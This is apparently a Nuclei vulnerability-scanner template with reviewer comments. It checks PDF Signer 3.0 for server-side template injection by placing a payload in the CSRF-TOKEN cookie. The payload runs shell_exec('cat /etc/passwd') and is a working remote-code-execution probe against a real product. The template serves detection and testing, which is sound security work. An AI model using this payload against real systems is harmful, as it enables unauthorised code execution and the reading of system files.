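# Nuclei HTTP template: checks whether PDF Signer 3.0 evaluates template
# syntax placed in the CSRF-TOKEN cookie (server-side template injection,
# CWE-1336). It sends a single GET request and reports a finding only when
# the response proves the expression was executed on the server.
#
# NOTE(review): the nesting below was restored from a flattened page render;
# confirm it against the upstream template before use.
id: pdf-signer-ssti-to-rce

info:
  name: PDF Signer 3.0 - Template Injection
  author: madrobot
  severity: critical
  description: PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server.
  classification:
    # Unauthenticated, network-reachable, no user interaction: the vector
    # below is what yields the 9.8 score.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-1336
  metadata:
    max-request: 1
  tags: ssti,rce,csrf

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      # The probe travels in the Cookie header, not the URL. Access logs
      # that record only the request line will not show it; to detect this
      # class of request, inspect the CSRF-TOKEN cookie for template
      # delimiters.
      Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
    # The braces in the cookie are meant for the target's template engine,
    # not for nuclei. Without this flag nuclei would treat them as an
    # unresolved variable of its own and not send the request.
    skip-variables-check: true

    # Both matchers must hold for a finding.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # Matches a root entry in passwd format in the response body, i.e.
      # evidence that the file was actually read. This only confirms
      # Unix-like hosts: no match does not show the application is patched.
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

# NOTE(review): the digest below was issued for the upstream file. Any edit,
# comments included, presumably invalidates it; re-sign the template before
# relying on signature verification.
# digest: 490a004630440220346f42ec245dba5a5da138043cc2f9e8f3e5979db4c9db118d907d6c5dbbc44602203f58036f592e1767eb81a87cdf8169f704f3715b094ef1cadbf36dba96651657:922c64590222798bb761d5b6d8e72950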